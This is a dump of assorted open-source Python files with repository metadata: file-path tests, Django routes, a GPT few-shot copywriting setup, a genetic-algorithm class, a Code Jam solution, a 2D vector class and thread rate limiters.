] | 27 | 2015-03-30T08:42:56.000Z | 2022-02-02T01:18:48.000Z | fs/tests/test_basename.py | sturmianseq/python-fs | 2567922ced9387e327e65f3244caff3b7af35684 | [
"MIT"
] | 8 | 2015-06-02T11:50:58.000Z | 2022-02-27T18:51:14.000Z | fs/tests/test_basename.py | sturmianseq/python-fs | 2567922ced9387e327e65f3244caff3b7af35684 | [
"MIT"
] | 12 | 2015-03-30T08:42:59.000Z | 2021-11-27T19:37:03.000Z | import fs
from .setup import * | 21.230769 | 46 | 0.601449 | import fs
from .setup import *
def test_basename_from_path():
    """fs.basename on a nested path returns only the final path component."""
    _filename = 'test'
    _ext = ".txt"
    _file = "foo/bar/%s%s" % (_filename, _ext)
    _base = fs.basename(_file)
    assert _base == "%s%s" % (_filename, _ext)
def test_basename_from_file():
    """fs.basename on a bare file name returns the name unchanged."""
    _filename = 'test'
    _ext = ".txt"
    _file = "%s%s" % (_filename, _ext)
    _base = fs.basename(_file)
    assert _base == "%s%s" % (_filename, _ext)
def test_basename_strip_ext():
    """Passing ext=<suffix> strips that exact extension from the result."""
    _filename = 'test'
    _ext = ".txt"
    _file = "foo/bar/%s%s" % (_filename, _ext)
    _base = fs.basename(_file, ext=_ext)
    assert _base == "%s" % _filename
def test_basename_autostrip_ext():
    """Passing ext=False strips whatever extension the file happens to have."""
    _filename = 'test'
    _ext = ".txt"
    _file = "foo/bar/%s%s" % (_filename, _ext)
    _base = fs.basename(_file, ext=False)
    assert _base == "%s" % _filename
c5a555a8b9b1cb1e5f2287edaf048bdd98415f62 | 273 | py | Python | scraper/urls.py | yujhenchen/boulderingScraper | 03d3c0bb0cb25b783476edd9150bd94413dd08a4 | [
"MIT"
] | null | null | null | scraper/urls.py | yujhenchen/boulderingScraper | 03d3c0bb0cb25b783476edd9150bd94413dd08a4 | [
"MIT"
] | 2 | 2021-11-25T23:30:13.000Z | 2021-11-28T14:51:44.000Z | scraper/urls.py | yujhenchen/boulderingScraper | 03d3c0bb0cb25b783476edd9150bd94413dd08a4 | [
"MIT"
] | null | null | null | from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('competitions', views.competitions, name='competitions'),
path('athletes', views.athletes, name='athletes'),
path('news', views.news, name='news')
] | 27.3 | 66 | 0.673993 | from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('competitions', views.competitions, name='competitions'),
path('athletes', views.athletes, name='athletes'),
path('news', views.news, name='news')
] | 0 | 0 | 0 |
78f99f79e162e5576845d61737e73b44e165cf59 | 3,110 | py | Python | examples/Sales_Copy/run_feature_benefits.py | paigebranam/Halldon_ | 1f02878e39e818055f86b8db570f30ae280948dc | [
"MIT"
] | null | null | null | examples/Sales_Copy/run_feature_benefits.py | paigebranam/Halldon_ | 1f02878e39e818055f86b8db570f30ae280948dc | [
"MIT"
] | null | null | null | examples/Sales_Copy/run_feature_benefits.py | paigebranam/Halldon_ | 1f02878e39e818055f86b8db570f30ae280948dc | [
"MIT"
] | null | null | null | ##updated api path, engine, top p
##Runs as expected
import os
import sys
API_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..')
sys.path.append(API_PATH)
from api import GPT, Example, UIConfig
# Construct GPT object and show some examples
gpt = GPT(engine="curie-instruct-beta",
temperature=0.5,
top_p=1,
max_tokens=100)
##Generate feature to benefit for product
gpt.add_example(Example("""AirPods Max, Introducing AirPods Max — a perfect balance of exhilarating high-fidelity audio
and the effortless magic of AirPods. The ultimate personal listening experience is here.""",
"""A deeper richer bass, an expansive soundstage, and less distortion make listening to your favorite music with AirPods Max a treat for the ears."""))
gpt.add_example(Example("""AirPods Max, Introducing AirPods Max — a perfect balance of exhilarating high-fidelity audio
and the effortless magic of AirPods. The ultimate personal listening experience is here.""",
"""Experience wireless audio the way it’s meant to be heard with AirPods Max"""))
gpt.add_example(Example("""AirPods Max, Introducing AirPods Max — a perfect balance of exhilarating high-fidelity audio
and the effortless magic of AirPods. The ultimate personal listening experience is here.""",
"""AirPods Max sound better than the original AirPods, feature world-class noise cancellation and come with TrueWireless™ technology."""))
gpt.add_example(Example("""AirPods Max, Introducing AirPods Max — a perfect balance of exhilarating high-fidelity audio
and the effortless magic of AirPods. The ultimate personal listening experience is here.""",
"""Listen to more of your music than ever, in unparalleled quality, with no wires."""))
gpt.add_example(Example("""Bento Lunch Box Container, slim design but it is also more than enough space,
sometimes too much. The biggest plus is that it is BPA free and FDA approved. A huge win when trying to eat clean!""",
"""Perfect size for my two year old. More space than I thought but with a slim design, it doesn’t take up too much room in my diaper bag."""))
gpt.add_example(Example("""Bento Lunch Box Container, slim design but it is also more than enough space,
sometimes too much. The biggest plus is that it is BPA free and FDA approved. A huge win when trying to eat clean!""",
"""If you are a parent you understand how you want the best for your child. The Bento Box is perfect for little hands.
It promotes portion control and healthy eating habits."""))
gpt.add_example(Example("""Bento Lunch Box Container, slim design but it is also more than enough space,
sometimes too much. The biggest plus is that it is BPA free and FDA approved. A huge win when trying to eat clean!""",
"""Because the 3 compartment, 6 separate container is so much bigger, it takes less time to pack the lunchbox up."""))
# Define UI configuration
config = UIConfig(description="Create feature to benefits for your product",
button_text="Create",
placeholder="Enter product description and name")
id = "feature-benefits" | 51.833333 | 151 | 0.749839 | ##updated api path, engine, top p
##Runs as expected
import os
import sys
API_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..')
sys.path.append(API_PATH)
from api import GPT, Example, UIConfig
# Construct GPT object and show some examples
gpt = GPT(engine="curie-instruct-beta",
temperature=0.5,
top_p=1,
max_tokens=100)
##Generate feature to benefit for product
gpt.add_example(Example("""AirPods Max, Introducing AirPods Max — a perfect balance of exhilarating high-fidelity audio
and the effortless magic of AirPods. The ultimate personal listening experience is here.""",
"""A deeper richer bass, an expansive soundstage, and less distortion make listening to your favorite music with AirPods Max a treat for the ears."""))
gpt.add_example(Example("""AirPods Max, Introducing AirPods Max — a perfect balance of exhilarating high-fidelity audio
and the effortless magic of AirPods. The ultimate personal listening experience is here.""",
"""Experience wireless audio the way it’s meant to be heard with AirPods Max"""))
gpt.add_example(Example("""AirPods Max, Introducing AirPods Max — a perfect balance of exhilarating high-fidelity audio
and the effortless magic of AirPods. The ultimate personal listening experience is here.""",
"""AirPods Max sound better than the original AirPods, feature world-class noise cancellation and come with TrueWireless™ technology."""))
gpt.add_example(Example("""AirPods Max, Introducing AirPods Max — a perfect balance of exhilarating high-fidelity audio
and the effortless magic of AirPods. The ultimate personal listening experience is here.""",
"""Listen to more of your music than ever, in unparalleled quality, with no wires."""))
gpt.add_example(Example("""Bento Lunch Box Container, slim design but it is also more than enough space,
sometimes too much. The biggest plus is that it is BPA free and FDA approved. A huge win when trying to eat clean!""",
"""Perfect size for my two year old. More space than I thought but with a slim design, it doesn’t take up too much room in my diaper bag."""))
gpt.add_example(Example("""Bento Lunch Box Container, slim design but it is also more than enough space,
sometimes too much. The biggest plus is that it is BPA free and FDA approved. A huge win when trying to eat clean!""",
"""If you are a parent you understand how you want the best for your child. The Bento Box is perfect for little hands.
It promotes portion control and healthy eating habits."""))
gpt.add_example(Example("""Bento Lunch Box Container, slim design but it is also more than enough space,
sometimes too much. The biggest plus is that it is BPA free and FDA approved. A huge win when trying to eat clean!""",
"""Because the 3 compartment, 6 separate container is so much bigger, it takes less time to pack the lunchbox up."""))
# Define UI configuration
config = UIConfig(description="Create feature to benefits for your product",
button_text="Create",
placeholder="Enter product description and name")
id = "feature-benefits" | 0 | 0 | 0 |
3ea22cc355f99d35ee6009dc89e48eddc997383e | 4,875 | py | Python | Transposon.py | blakedallen/transposon | c94c2a9323a0f20042068bf75f3736ca51b1f239 | [
"MIT"
] | null | null | null | Transposon.py | blakedallen/transposon | c94c2a9323a0f20042068bf75f3736ca51b1f239 | [
"MIT"
] | null | null | null | Transposon.py | blakedallen/transposon | c94c2a9323a0f20042068bf75f3736ca51b1f239 | [
"MIT"
] | null | null | null | import numpy as np
from random import randint
class Transposon(object):
""" Transposon is our general class used for evolutionary
algorithms applied to vectors"""
def initialize(self):
""" sets up our population and asserts
our fitness func is of correct type
"""
assert self.mutation_rate >= 0.0
assert self.mutation_rate <= 1.0
assert self.fitness_func != None
assert self.winner_pool >= 0.0
assert self.winner_pool <= 1.0
assert self.vector_len >= 0.0
#setup a random vector and assert that our fitness_func is of correct type
random_vector = self.create_vector()
#use our fitness function, assert that the value is correct
fitness = self.fitness_func(random_vector)
assert fitness >= 0.0
#now create our population
population = [random_vector]
for i in range(1,self.population_size):
population.append(self.create_vector())
self.population = population
def create_vector(self, replace=False):
"""
Create a random vector
replace = whether or not we can replace values (default false, ie: each value is unique)
"""
return np.random.choice(self.values, self.vector_len, replace=replace).tolist()
def mutate(self):
""" create mutations randomly based on the mutation rate
preserves winner pool so that the best individuals aren't mutated
"""
if self.mutation_rate == 0:
return
mutated_population = []
for i,individual in enumerate(self.population):
mutation_vec = np.random.choice(2, len(individual), p=[1.0-self.mutation_rate, self.mutation_rate])
combined_vec = []
for i,m in enumerate(mutation_vec):
if m == 1:
#random mutation
rand = randint(self.min_value, self.max_value)
combined_vec.append(rand)
else:
#no mutation
combined_vec.append(individual[i])
mutated_population.append(combined_vec)
#now we preserve our best individuals and drop the last x mutated individuals
num_best = int(self.winner_pool*self.population_size)
self.population = self.population[:num_best] + mutated_population[:len(mutated_population)-num_best]
def transpose(self):
""" Transpose is another mutation function where we mimic actual transposons
moving a random sequence from one location and inserting it into another location"""
pass
def breed(self, replace=True):
""" given the top x percent breed new solutions """
num_breeders = int(self.winner_pool*self.population_size)
breeders = self.population[:num_breeders]
num_children = self.population_size - num_breeders
pairings = np.random.choice(num_breeders, num_children, replace=replace)
children = []
for i,pair in enumerate(pairings):
i1 = int(i%len(breeders))
i2 = int(pair%len(breeders))
parent1 = breeders[i1]
parent2 = breeders[i2]
child_vector = []
#create our vector [0,1,0,0..] which chooses which item to take from each individual
breed_vector = np.random.choice(2, len(breeders[0]))
for i,v in enumerate(breed_vector):
if v == 0:
child_vector.append(parent1[i])
else:
child_vector.append(parent2[i])
children.append(child_vector)
#now create our new population
self.population = self.population[:num_breeders] + children
def evaluate(self):
"""
evaluate the fitness of each individual
sort the individuals by fitness (descending order with most fit first)
if any individual is of max_fitness then return true, else false
"""
scored = []
for individual in self.population:
fitness = self.fitness_func(individual)
scored.append((individual,fitness))
#sort our individuals by fitness (Descending)
sorted_pop = sorted(scored, reverse=True, key=lambda x: x[1])
#sort our population in descending fitness
self.population = [x[0] for x in sorted_pop]
#return just our fitness scores
return [x[1] for x in sorted_pop]
def evolve(self):
""" main for-loop for genetic algorithm"""
for i in range(0,self.max_generations):
pop_fitness = self.evaluate()
if self.verbose == True:
print("Generation: ", i, " Top fitness: ", pop_fitness[0])
if pop_fitness[0] >= self.max_fitness:
return self.population
self.breed()
self.mutate()
#reached max generations without getting a max_fitness
return self.population
| 31.451613 | 102 | 0.726974 | import numpy as np
from random import randint
class Transposon(object):
    """ Transposon is our general class used for evolutionary
        algorithms applied to vectors"""

    def __init__(self,
                 vector_len=100,
                 fitness_func=None,
                 min_value=0,
                 max_value=100,
                 population_size=1000,
                 max_fitness=1.0,
                 max_generations=1000,
                 mutation_rate=0.13,
                 winner_pool=0.10,
                 verbose=False):
        """
        :param vector_len: length of each individual's vector
            (must not exceed max_value - min_value + 1, because
            create_vector samples without replacement)
        :param fitness_func: callable(vector) -> non-negative fitness score
        :param min_value: smallest allowed gene value (inclusive)
        :param max_value: largest allowed gene value (inclusive)
        :param population_size: number of individuals per generation
        :param max_fitness: evolution stops once the top fitness reaches this
        :param max_generations: hard cap on the number of generations
        :param mutation_rate: per-gene probability of a random mutation
        :param winner_pool: fraction of top individuals preserved and bred
        :param verbose: print per-generation progress when True
        """
        self.vector_len = vector_len
        self.fitness_func = fitness_func
        self.population_size = population_size
        self.max_fitness = max_fitness
        self.verbose = verbose
        self.winner_pool = winner_pool
        # inclusive pool of values a gene may take
        self.values = list(range(min_value, max_value + 1))
        self.max_generations = max_generations
        self.mutation_rate = mutation_rate
        self.min_value = min_value
        self.max_value = max_value
        self.initialize()

    def initialize(self):
        """ sets up our population and asserts
            our fitness func is of correct type
        """
        assert self.mutation_rate >= 0.0
        assert self.mutation_rate <= 1.0
        assert self.fitness_func != None
        assert self.winner_pool >= 0.0
        assert self.winner_pool <= 1.0
        assert self.vector_len >= 0.0
        # setup a random vector and assert that our fitness_func is of correct type
        random_vector = self.create_vector()
        # use our fitness function, assert that the value is correct
        fitness = self.fitness_func(random_vector)
        assert fitness >= 0.0
        # now create our population
        population = [random_vector]
        for _ in range(1, self.population_size):
            population.append(self.create_vector())
        self.population = population

    def create_vector(self, replace=False):
        """
        Create a random vector of length self.vector_len drawn from self.values.
        :param replace: whether values may repeat (default False: each value
            in the vector is unique, so vector_len must not exceed len(values))
        """
        return np.random.choice(self.values, self.vector_len, replace=replace).tolist()

    def mutate(self):
        """ create mutations randomly based on the mutation rate
            preserves winner pool so that the best individuals aren't mutated
        """
        if self.mutation_rate == 0:
            return
        mutated_population = []
        for individual in self.population:
            # 1 marks a gene to mutate, drawn with probability mutation_rate
            # (the previous code reused the loop variable `i` for both the
            # individual index and the gene index; the gene loop now uses its
            # own name so the two no longer shadow each other)
            mutation_vec = np.random.choice(2, len(individual),
                                            p=[1.0 - self.mutation_rate, self.mutation_rate])
            combined_vec = []
            for gene_idx, mutate_flag in enumerate(mutation_vec):
                if mutate_flag == 1:
                    # random mutation: draw a fresh value from the allowed range
                    combined_vec.append(randint(self.min_value, self.max_value))
                else:
                    # no mutation: keep the original gene
                    combined_vec.append(individual[gene_idx])
            mutated_population.append(combined_vec)
        # now we preserve our best individuals and drop the last x mutated individuals
        num_best = int(self.winner_pool * self.population_size)
        self.population = (self.population[:num_best] +
                           mutated_population[:len(mutated_population) - num_best])

    def transpose(self):
        """ Transpose is another mutation function where we mimic actual transposons
            moving a random sequence from one location and inserting it into another
            location. NOTE: not implemented yet; calling it is a no-op. """
        pass

    def breed(self, replace=True):
        """ given the top x percent breed new solutions """
        num_breeders = int(self.winner_pool * self.population_size)
        breeders = self.population[:num_breeders]
        num_children = self.population_size - num_breeders
        # parent1 cycles through the breeders in order; parent2 is drawn randomly
        pairings = np.random.choice(num_breeders, num_children, replace=replace)
        children = []
        for child_idx, pair in enumerate(pairings):
            parent1 = breeders[int(child_idx % len(breeders))]
            parent2 = breeders[int(pair % len(breeders))]
            child_vector = []
            # create our vector [0,1,0,0..] which chooses which parent each gene comes from
            breed_vector = np.random.choice(2, len(breeders[0]))
            for gene_idx, which_parent in enumerate(breed_vector):
                if which_parent == 0:
                    child_vector.append(parent1[gene_idx])
                else:
                    child_vector.append(parent2[gene_idx])
            children.append(child_vector)
        # now create our new population
        self.population = self.population[:num_breeders] + children

    def evaluate(self):
        """
        Evaluate the fitness of each individual and sort the population
        in place by descending fitness (fittest first).

        :returns: the list of fitness scores, sorted in descending order,
            aligned with self.population (scores[0] belongs to population[0])
        """
        scored = []
        for individual in self.population:
            fitness = self.fitness_func(individual)
            scored.append((individual, fitness))
        # sort our individuals by fitness (descending)
        sorted_pop = sorted(scored, reverse=True, key=lambda x: x[1])
        # keep the population ordered fittest-first
        self.population = [x[0] for x in sorted_pop]
        # return just our fitness scores
        return [x[1] for x in sorted_pop]

    def evolve(self):
        """ main for-loop for genetic algorithm"""
        for generation in range(0, self.max_generations):
            pop_fitness = self.evaluate()
            if self.verbose == True:
                print("Generation: ", generation, " Top fitness: ", pop_fitness[0])
            if pop_fitness[0] >= self.max_fitness:
                return self.population
            self.breed()
            self.mutate()
        # reached max generations without getting a max_fitness
        return self.population
| 623 | 0 | 24 |
f50d60ba29fb57d14a40dc72e1e8a1b0b30c5600 | 1,170 | py | Python | google codejam/sorting/Reversort engineering/Answer.py | theCodeTeen/CP_Collection | 78a0a564e8da47038232b0cca6f26153725af029 | [
"MIT"
] | null | null | null | google codejam/sorting/Reversort engineering/Answer.py | theCodeTeen/CP_Collection | 78a0a564e8da47038232b0cca6f26153725af029 | [
"MIT"
] | null | null | null | google codejam/sorting/Reversort engineering/Answer.py | theCodeTeen/CP_Collection | 78a0a564e8da47038232b0cca6f26153725af029 | [
"MIT"
] | null | null | null |
for i in range(int(input())):
solution()
#Author: Dharmik Bhadra | 20.892857 | 57 | 0.460684 | def createArray(no):
arr=[]
for i in range(1,no+1):
arr.append(i)
return arr
def ArrayOpp(no,cost):
if cost<no-1:
return []
arr=[]
t=0
c=1
for i in range(no-1,0,-1):
c+=1
if t+c+i-1>=cost:
r=cost-t-i+1
arr.append(r)
for k in range(i-1):
arr.append(1)
t=cost
break
t+=c
arr.append(c)
if t<cost:
return[]
return arr
def opp(arr,opArray):
length=len(opArray)
for i in range(length):
t=len(arr)-(i+2)
sp=t+opArray[i]
arr=arr[:t]+list(reversed(arr[t:sp])) + arr[sp:]
return arr
def solution():
inp=input().split()
no=int(inp[0])
cost=int(inp[1])
arr=createArray(no)
opArray=ArrayOpp(no,cost)
arr=opp(arr,opArray)
result=""
if opArray:
for item in arr:
result += str(item)+" "
else:
result="IMPOSSIBLE"
print("Case #"+str(i+1)+": "+str(result))
for i in range(int(input())):
solution()
#Author: Dharmik Bhadra | 993 | 0 | 99 |
8bfdb2468a7478d911bc550aafd9389c3602480f | 1,061 | py | Python | Chapter08/SVector2D.py | fengsong77/ai-game-python | ed47596c5ed9989b344069b07bef055c8c0560e9 | [
"MIT"
] | 5 | 2017-06-15T02:08:08.000Z | 2021-05-24T12:17:04.000Z | Chapter08/SVector2D.py | fengsong77/ai-game-python | ed47596c5ed9989b344069b07bef055c8c0560e9 | [
"MIT"
] | 2 | 2017-10-20T22:23:45.000Z | 2018-12-02T13:17:34.000Z | Chapter09/SVector2D.py | crazyskady/ai-game-python | ed47596c5ed9989b344069b07bef055c8c0560e9 | [
"MIT"
] | 5 | 2017-10-23T15:02:20.000Z | 2021-06-06T08:28:36.000Z | # -*- coding: utf-8 -*-
from math import sqrt
| 25.261905 | 156 | 0.694628 | # -*- coding: utf-8 -*-
from math import sqrt
class SVector2D(object):
    """A simple 2D vector with componentwise arithmetic.

    Operands may be another SVector2D (componentwise op) or, for * and /,
    a plain number (uniform scaling).
    """

    def __init__(self, a=0.0, b=0.0):
        self._x = a
        self._y = b

    def __add__(self, rhs):
        """Componentwise addition with another vector."""
        return SVector2D(self._x + rhs._x, self._y + rhs._y)

    def __sub__(self, rhs):
        """Componentwise subtraction of another vector."""
        return SVector2D(self._x - rhs._x, self._y - rhs._y)

    def __mul__(self, rhs):
        """Componentwise product with a vector, or scaling by a number."""
        if isinstance(rhs, SVector2D):
            return SVector2D(self._x * rhs._x, self._y * rhs._y)
        else:
            return SVector2D(self._x * rhs, self._y * rhs)

    def __div__(self, rhs):
        """Componentwise division by a vector, or by a scalar."""
        # These branches could each be written as a one-line conditional
        # expression, e.g.:
        # return SVector2D(self._x/rhs._x, self._y/rhs._y) if isinstance(rhs, SVector2D) else SVector2D(self._x/rhs, self._y/rhs)
        if isinstance(rhs, SVector2D):
            return SVector2D(self._x / rhs._x, self._y / rhs._y)
        else:
            return SVector2D(self._x / rhs, self._y / rhs)

    # ``__div__`` is only consulted by Python 2; alias it so the ``/``
    # operator also works under Python 3 (which looks up ``__truediv__``).
    __truediv__ = __div__
def Vec2DLength(v):
    """Return the Euclidean length (magnitude) of the vector *v*."""
    x_squared = v._x * v._x
    y_squared = v._y * v._y
    return sqrt(x_squared + y_squared)
def Vec2DNormalize(v):
    """Return a new SVector2D pointing in the direction of *v* with length 1.

    Raises ZeroDivisionError when *v* is the zero vector.
    """
    vector_length = Vec2DLength(v)
    return SVector2D(v._x/vector_length, v._y/vector_length)
def Vec2DDot(v1, v2):
    """Return the dot (scalar) product of the two 2D vectors."""
    product_x = v1._x * v2._x
    product_y = v1._y * v2._y
    return product_x + product_y
def Vec2DSign(v1, v2):
    """Return 1 when v1._y * v2._x exceeds v1._x * v2._y, else -1.

    This is the sign of the 2D cross-product comparison, commonly used to
    tell which side of v1 the vector v2 lies on.
    """
    if v1._y * v2._x > v1._x * v2._y:
        return 1
    return -1
| 793 | 3 | 234 |
fe62a3b8c957cd45f1e51b3e86c79f886f93ff1a | 6,443 | py | Python | xTool/utils/throttle.py | luciferliu/xTools | 324ef1388be13ece0d952e3929eb685212d573f1 | [
"Apache-2.0"
] | 2 | 2020-09-02T13:46:06.000Z | 2020-10-11T16:11:02.000Z | xTool/utils/throttle.py | luciferliu/xTools | 324ef1388be13ece0d952e3929eb685212d573f1 | [
"Apache-2.0"
] | null | null | null | xTool/utils/throttle.py | luciferliu/xTools | 324ef1388be13ece0d952e3929eb685212d573f1 | [
"Apache-2.0"
] | 4 | 2018-10-15T07:08:34.000Z | 2019-11-26T01:52:47.000Z | # coding: utf-8
from builtins import object
import time
import threading
from xTool.compat import PY3
if PY3:
from threading import BoundedSemaphore
else:
from threading import _BoundedSemaphore as BoundedSemaphore
class BoundedEmptySemaphore(BoundedSemaphore):
"""
A bounded semaphore that is initially empty.
"""
class GlobalThrottle(object):
"""一个线程安全的全局限速器,用于访问全局资源;可以应用到所有的线程上。
也可以认为是一个令牌桶算法,BoundedEmptySemaphore就是一个令牌桶。
A thread-safe rate limiter that throttles all threads globally. This should be used to
regulate access to a global resource. It can be used as a function/method decorator or as a
simple object, using the throttle() method. The token generation starts with the first call
to throttle() or the decorated function. Each subsequent call to throttle() will then acquire
a token, possibly having to wait until one becomes available. The number of unused tokens
will not exceed a limit given at construction time. This is a very basic mechanism to
prevent the resource from becoming swamped after longer pauses.
"""
def __init__(self, min_interval, max_unused):
"""
:param min_interval: 资源探测的间隔时间,也即令牌的生成间隔
:param max_unused: 信号量的大小,即资源的数量,也即令牌的数量
"""
# 线程的间隔时间
self.min_interval = min_interval
# 创建信号量,并调用acquire使其内部计数器等于0,阻塞进程
self.semaphore = BoundedEmptySemaphore(max_unused)
# 创建线程锁
self.thread_start_lock = threading.Lock()
# 默认不启动线程
self.thread_started = False
# 创建线程
self.thread = threading.Thread(target=self.generator)
# 主线程结束时,子线程也随之结束
self.thread.daemon = True
def throttle(self, wait=True):
"""
If the wait parameter is True, this method returns True after suspending the current
thread as necessary to ensure that no less than the configured minimum interval passed
since the most recent time an invocation of this method returned True in any thread.
If the wait parameter is False, this method immediatly returns True if at least the
configured minimum interval has passed since the most recent time this method returned
True in any thread, or False otherwise.
"""
# I think there is a race in Thread.start(), hence the lock
with self.thread_start_lock:
# 启动子线程,不停地释放信号量
if not self.thread_started:
self.thread.start()
self.thread_started = True
# 新请求来临时,会各自拿走一个Token, 如果没有Token可拿了就阻塞或者拒绝服务.
return self.semaphore.acquire(blocking=wait)
class LocalThrottle(object):
"""一个线程安全的单个线程限速器,在指定时间间隔后才会运行
A thread-safe rate limiter that throttles each thread independently. Can be used as a
function or method decorator or as a simple object, via its .throttle() method.
The use as a decorator is deprecated in favor of throttle().
"""
def __init__(self, min_interval):
"""
Initialize this local throttle.
:param min_interval: The minimum interval in seconds between invocations of the throttle
method or, if this throttle is used as a decorator, invocations of the decorated method.
"""
self.min_interval = min_interval
# 线程局部变量
self.per_thread = threading.local()
self.per_thread.last_invocation = None
def throttle(self, wait=True):
"""
If the wait parameter is True, this method returns True after suspending the current
thread as necessary to ensure that no less than the configured minimum interval has
passed since the last invocation of this method in the current thread returned True.
If the wait parameter is False, this method immediatly returns True (if at least the
configured minimum interval has passed since the last time this method returned True in
the current thread) or False otherwise.
"""
now = time.time()
last_invocation = self.per_thread.last_invocation
if last_invocation is not None:
# 计算时间过了多久
interval = now - last_invocation
# 时间未过期,继续等待;到期后执行函数
if interval < self.min_interval:
if wait:
remainder = self.min_interval - interval
time.sleep(remainder)
else:
return False
self.per_thread.last_invocation = time.time()
return True
class throttle(object): # pylint: disable=invalid-name
"""在函数执行之后等待,直到超时;如果有异常不等待
A context manager for ensuring that the execution of its body takes at least a given amount
of time, sleeping if necessary. It is a simpler version of LocalThrottle if used as a
decorator.
Ensures that body takes at least the given amount of time.
"""
| 35.794444 | 97 | 0.652025 | # coding: utf-8
from builtins import object
import time
import threading
from xTool.compat import PY3
if PY3:
from threading import BoundedSemaphore
else:
from threading import _BoundedSemaphore as BoundedSemaphore
class BoundedEmptySemaphore(BoundedSemaphore):
    """
    A bounded semaphore that is initially empty.

    From a token-bucket perspective this is a bucket whose tokens are all
    consumed at construction time; ``value`` is the bucket's capacity
    (the maximum number of tokens it can ever hold).
    """

    def __init__(self, value=1):
        super(BoundedEmptySemaphore, self).__init__(value)
        # Drain the semaphore so it starts empty. Use an explicit check
        # instead of ``assert self.acquire(...)``: asserts are stripped under
        # ``python -O``, which would silently skip the drain (the acquire is
        # a side effect, not just a check) and leave the semaphore full.
        for _ in range(value):
            if not self.acquire(blocking=False):
                raise RuntimeError(
                    "could not drain freshly created semaphore")
class GlobalThrottle(object):
    """A thread-safe global rate limiter for access to a shared global
    resource; it applies to all threads at once.

    It can also be seen as a token-bucket algorithm, with
    BoundedEmptySemaphore acting as the token bucket.

    A thread-safe rate limiter that throttles all threads globally. This should be used to
    regulate access to a global resource. It can be used as a function/method decorator or as a
    simple object, using the throttle() method. The token generation starts with the first call
    to throttle() or the decorated function. Each subsequent call to throttle() will then acquire
    a token, possibly having to wait until one becomes available. The number of unused tokens
    will not exceed a limit given at construction time. This is a very basic mechanism to
    prevent the resource from becoming swamped after longer pauses.
    """

    def __init__(self, min_interval, max_unused):
        """
        :param min_interval: interval between resource probes, i.e. the
            token generation interval in seconds
        :param max_unused: size of the semaphore, i.e. the number of
            resources / the maximum number of unused tokens
        """
        # interval between token-generator iterations
        self.min_interval = min_interval
        # create the semaphore; BoundedEmptySemaphore drains itself so its
        # internal counter starts at 0 and acquirers block
        self.semaphore = BoundedEmptySemaphore(max_unused)
        # lock guarding the one-time start of the generator thread
        self.thread_start_lock = threading.Lock()
        # the generator thread is not started until the first throttle() call
        self.thread_started = False
        # create the token-generator thread
        self.thread = threading.Thread(target=self.generator)
        # daemon: when the main thread exits, this thread exits with it
        self.thread.daemon = True

    def generator(self):
        # Runs forever in a daemon thread, adding one token per interval.
        while True:
            try:
                # As time passes, add a token every 1/QPS seconds (like a tap
                # steadily refilling the bucket — the inverse of a leaky
                # bucket); if the bucket is already full, skip this round.
                # Incoming requests each take one token; when none are left
                # they block or are refused.
                self.semaphore.release()
            except ValueError:
                # bucket already full (bounded semaphore refuses the release)
                pass
            time.sleep(self.min_interval)

    def throttle(self, wait=True):
        """
        If the wait parameter is True, this method returns True after suspending the current
        thread as necessary to ensure that no less than the configured minimum interval passed
        since the most recent time an invocation of this method returned True in any thread.
        If the wait parameter is False, this method immediatly returns True if at least the
        configured minimum interval has passed since the most recent time this method returned
        True in any thread, or False otherwise.
        """
        # I think there is a race in Thread.start(), hence the lock
        with self.thread_start_lock:
            # lazily start the child thread that keeps releasing the semaphore
            if not self.thread_started:
                self.thread.start()
                self.thread_started = True
            # each incoming request takes one token; when none are left it
            # blocks (wait=True) or is refused (wait=False)
            return self.semaphore.acquire(blocking=wait)

    def __call__(self, function):
        # Decorator form: throttle before each invocation of the wrapped function.
        def wrapper(*args, **kwargs):
            self.throttle()
            return function(*args, **kwargs)
        return wrapper
class LocalThrottle(object):
    """A thread-safe rate limiter that throttles each thread independently.

    Can be used as a function or method decorator or as a simple object,
    via its .throttle() method.
    The use as a decorator is deprecated in favor of throttle().
    """

    def __init__(self, min_interval):
        """
        Initialize this local throttle.
        :param min_interval: The minimum interval in seconds between invocations of the throttle
        method or, if this throttle is used as a decorator, invocations of the decorated method.
        """
        self.min_interval = min_interval
        # Per-thread storage for the last time throttle() returned True.
        # NOTE: attributes set on a threading.local in one thread are NOT
        # visible in other threads, so we must not pre-set last_invocation
        # here and assume it exists later — the previous implementation did
        # exactly that and raised AttributeError in every thread other than
        # the one that constructed this object.
        self.per_thread = threading.local()

    def throttle(self, wait=True):
        """
        If the wait parameter is True, this method returns True after suspending the current
        thread as necessary to ensure that no less than the configured minimum interval has
        passed since the last invocation of this method in the current thread returned True.
        If the wait parameter is False, this method immediatly returns True (if at least the
        configured minimum interval has passed since the last time this method returned True in
        the current thread) or False otherwise.
        """
        now = time.time()
        # default to None for threads that have never called throttle()
        last_invocation = getattr(self.per_thread, 'last_invocation', None)
        if last_invocation is not None:
            # how long since this thread's last successful call
            interval = now - last_invocation
            # if the interval has not yet elapsed, either sleep it off or refuse
            if interval < self.min_interval:
                if wait:
                    remainder = self.min_interval - interval
                    time.sleep(remainder)
                else:
                    return False
        self.per_thread.last_invocation = time.time()
        return True

    def __call__(self, function):
        # Decorator form (deprecated): throttle before each invocation.
        def wrapper(*args, **kwargs):
            self.throttle()
            return function(*args, **kwargs)
        return wrapper
class throttle(object):  # pylint: disable=invalid-name
    """Ensure its body takes at least min_interval seconds, sleeping if needed.

    A context manager for ensuring that the execution of its body takes at
    least a given amount of time, sleeping if necessary. It is a simpler
    version of LocalThrottle if used as a decorator.
    Ensures that body takes at least the given amount of time.
    If the body raises an exception, no extra sleep is performed.
    """

    def __init__(self, min_interval):
        # minimum wall-clock duration, in seconds, the body must take
        self.min_interval = min_interval

    def __enter__(self):
        self.start = time.time()
        # return self so "with throttle(x) as t:" binds the throttle
        # (previously __enter__ implicitly returned None)
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # only pad the duration on the success path
        if exc_type is None:
            # how long the body actually took
            duration = time.time() - self.start
            # sleep away whatever is left of the minimum interval
            remainder = self.min_interval - duration
            if remainder > 0:
                time.sleep(remainder)

    def __call__(self, function):
        # Decorator form: wrap each invocation in this context manager.
        def wrapper(*args, **kwargs):
            with self:
                return function(*args, **kwargs)
        return wrapper
| 1,692 | 0 | 216 |
